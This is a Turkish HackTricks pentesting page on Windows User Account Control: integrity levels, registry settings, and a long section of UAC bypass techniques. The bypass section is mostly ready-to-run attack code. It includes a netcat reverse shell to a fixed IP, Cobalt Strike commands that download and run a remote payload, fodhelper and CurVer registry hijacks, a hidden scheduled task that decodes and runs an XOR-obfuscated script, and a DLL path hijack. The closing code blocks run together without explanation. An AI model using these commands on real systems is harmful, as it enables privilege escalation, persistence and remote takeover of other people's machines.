UAC - User Account Control

Tip

AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE) Değerlendirme yolları (ARTA/GRTA/AzRTA) ve Linux Hacking Expert (LHE) için tam HackTricks Training kataloğuna göz atın.

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna, telegram grubuna katılın, X/Twitter üzerinde @hacktricks_live hesabını takip edin veya LinkedIn sayfasını ve YouTube kanalını kontrol edin.
• HackTricks ve HackTricks Cloud github depolarına PR göndererek hacking tricks paylaşın.

UAC

User Account Control (UAC), yükseltilmiş aktiviteler için bir onay istemi etkinleştiren bir özelliktir. Uygulamaların farklı integrity seviyeleri vardır ve yüksek seviyeye sahip bir program, sistemi potansiyel olarak tehlikeye atabilecek görevleri gerçekleştirebilir. UAC etkin olduğunda, uygulamalar ve görevler her zaman bir administrator olmayan hesabın security context’i altında çalışır; ta ki bir administrator bu uygulamaların/görevlerin sistemde administrator-level access ile çalışmasına açıkça izin verene kadar. Bu, administratorları istenmeyen değişikliklerden koruyan bir kolaylık özelliğidir ancak bir security boundary olarak kabul edilmez.

Integrity levels hakkında daha fazla bilgi için:

Integrity Levels

UAC etkin olduğunda, bir administrator kullanıcıya 2 token verilir: normal işlemleri regular level olarak yapmak için standart bir user key ve admin privileges içeren bir tane.

Bu page, UAC’nin nasıl çalıştığını derinlemesine tartışır ve logon process, user experience ve UAC architecture içerir. Administratorlar, security policies kullanarak UAC’nin kuruluşlarına özel olarak local seviyede nasıl çalışacağını (secpol.msc kullanarak) yapılandırabilir veya Active Directory domain ortamında Group Policy Objects (GPO) üzerinden yapılandırıp dağıtabilir. Çeşitli ayarlar here ayrıntılı olarak ele alınmıştır. UAC için ayarlanabilen 10 Group Policy ayarı vardır. Aşağıdaki tablo ek ayrıntı sağlar:

Windows’ta software yükleme politikaları

local security policies (“secpol.msc” çoğu sistemde) varsayılan olarak admin olmayan users’ların software installations yapmasını engelleyecek şekilde yapılandırılmıştır. Bu, admin olmayan bir user software’iniz için installer’ı indirse bile, bir admin account olmadan onu çalıştıramayacağı anlamına gelir.

UAC’nin Elevation sorması için Registry Keys

Admin rights’ı olmayan bir standart user olarak, “standard” hesabın belirli actions gerçekleştirmeye çalıştığında UAC tarafından credentials için istem almasını sağlayabilirsiniz. Bu işlem, UAC bypass yoksa ya da attacker zaten admin olarak giriş yapmadıysa, admin permissions gerektiren belirli registry keys’in değiştirilmesini gerektirir.

User Administrators group içinde olsa bile, bu değişiklikler administrative actions gerçekleştirmek için kullanıcının hesap kimlik bilgilerini yeniden girmesini zorunlu kılar.

Tek dezavantajı, bunun çalışması için UAC’nin disabled olması gerekmesidir; production environments’ta bunun böyle olması pek olası değildir.

Değiştirmeniz gereken registry keys ve entries şunlardır (varsayılan değerleri parantez içinde):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Bu işlem Local Security Policy aracı üzerinden manuel olarak da yapılabilir. Değiştirildikten sonra, administrative operations kullanıcıdan kimlik bilgilerini yeniden girmesini ister.

Note

User Account Control bir security boundary değildir. Bu nedenle, standard users local privilege escalation exploit olmadan hesaplarından çıkıp administrator rights elde edemez.

Bir user’dan ‘full computer access’ isteyin

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Privileges

• Internet Explorer Protected Mode, yüksek-integrity-level süreçlerin (web browser gibi) düşük-integrity-level verilerine (temporary Internet files folder gibi) erişmesini önlemek için integrity checks kullanır. Bu, browser’ın low-integrity token ile çalıştırılmasıyla yapılır. Browser low-integrity zone’da depolanan verilere erişmeye çalıştığında, operating system sürecin integrity level’ını kontrol eder ve erişime buna göre izin verir. Bu özellik, remote code execution attacks’ın sistemdeki hassas verilere erişmesini önlemeye yardımcı olur.
• Bir user Windows’a log on olduğunda, system kullanıcının privileges listesini içeren bir access token oluşturur. Privileges, bir kullanıcının rights ve capabilities birleşimi olarak tanımlanır. Token ayrıca kullanıcının credentials listesini de içerir; bunlar kullanıcının bilgisayara ve network üzerindeki resources’a authenticate edilmesi için kullanılan credentials’lardır.

Autoadminlogon

Windows’u startup sırasında belirli bir user’a automatically log on olacak şekilde configure etmek için AutoAdminLogon registry key ayarlayın. Bu, kiosk environments veya testing purposes için kullanışlıdır. Bunu yalnızca secure systems üzerinde kullanın, çünkü password’ü registry’de açığa çıkarır.

Registry Editor veya reg add kullanarak aşağıdaki keys’i set edin:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Normal logon davranışına geri dönmek için AutoAdminLogon değerini 0 olarak set edin.

UAC bypass

Tip

Not ki victim’a graphical access’iniz varsa, UAC bypass straight forward’dır çünkü UAC prompt göründüğünde simply “Yes“e click edebilirsiniz

UAC bypass şu durumda gerekir: UAC aktif, process’iniz medium integrity context’te çalışıyor ve user’ınız administrators group’a ait.

Şunu belirtmek önemlidir: UAC’yi en yüksek security level’da (Always) bypass etmek, diğer level’lardan herhangi birinde (Default) bypass etmekten çok daha zordur.

UAC disabled

Eğer UAC zaten disabled ise (ConsentPromptBehaviorAdmin 0), high integrity level ile bir reverse shell execute edebilirsiniz; örneğin:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

Token duplication ile UAC bypass

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Çok Temel UAC “bypass” (tam dosya sistemi erişimi)

Eğer Administrators grubunun içinde olan bir kullanıcıyla bir shell’iniz varsa, SMB (file system) üzerinden paylaşılan C$’yi yerel olarak yeni bir disk olarak mount edebilirsiniz ve dosya sisteminin içindeki her şeye erişiminiz olur (Administrator home folder dahil).

Warning

Görünüşe göre bu numara artık çalışmıyor

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

cobalt strike ile UAC bypass

Cobalt Strike teknikleri yalnızca UAC en yüksek güvenlik seviyesine ayarlanmadığında çalışır

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire ve Metasploit ayrıca UAC’yi bypass etmek için birkaç modüle sahiptir.

KRBUACBypass

https://github.com/wh0amitz/KRBUACBypass içinde dokümantasyon ve araç

UAC bypass exploits

UACME , birkaç UAC bypass exploitinin bir derlemesidir. UACME’yi visual studio veya msbuild kullanarak compile etmeniz gerektiğini unutmayın. Compilation, birkaç executable oluşturacaktır (örneğin Source\Akagi\outout\x64\Debug\Akagi.exe) , hangisine ihtiyacınız olduğunu bilmeniz gerekir.
Bazı bypass’ların, kullanıcıyı bir şeylerin olduğu konusunda uyaracak başka programlar promtp etmesi nedeniyle dikkatli olmalısınız.

UACME, her tekniğin çalışmaya başladığı build version’ı içerir. Sürümleriniz için hangi tekniğin etkili olduğunu arayabilirsiniz:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Ayrıca, this sayfasını kullanarak build sürümlerinden Windows sürümü 1607’yi elde edersiniz.

UAC Bypass – fodhelper.exe (Registry hijack)

Güvenilir binary fodhelper.exe, modern Windows’ta auto-elevated edilir. Başlatıldığında, DelegateExecute fiilini doğrulamadan aşağıdaki kullanıcı başına registry yolunu sorgular. Oraya bir command yerleştirmek, Medium Integrity bir process’in (kullanıcı Administrators grubundadır) UAC prompt olmadan High Integrity bir process başlatmasına izin verir.

fodhelper tarafından sorgulanan Registry yolu:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Notlar:
- Geçerli kullanıcı Administrators üyesi olduğunda ve UAC seviyesi varsayılan/lenient olduğunda çalışır (extra restrictions ile Always Notify değil).
- 64-bit Windows üzerinde 32-bit bir process’ten 64-bit PowerShell başlatmak için `sysnative` path kullanın.
- Payload herhangi bir command olabilir (PowerShell, cmd veya bir EXE path). Stealth için UI prompt'larından kaçının.

#### CurVer/extension hijack variant (HKCU only)

`fodhelper.exe` kullanan recent samples, `DelegateExecute` kullanmak yerine per-user `CurVer` value üzerinden **`ms-settings` ProgID'sini redirect eder**. Auto-elevated binary yine handler'ı `HKCU` altında resolve eder, bu yüzden keys'i plant etmek için admin token gerekmez:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"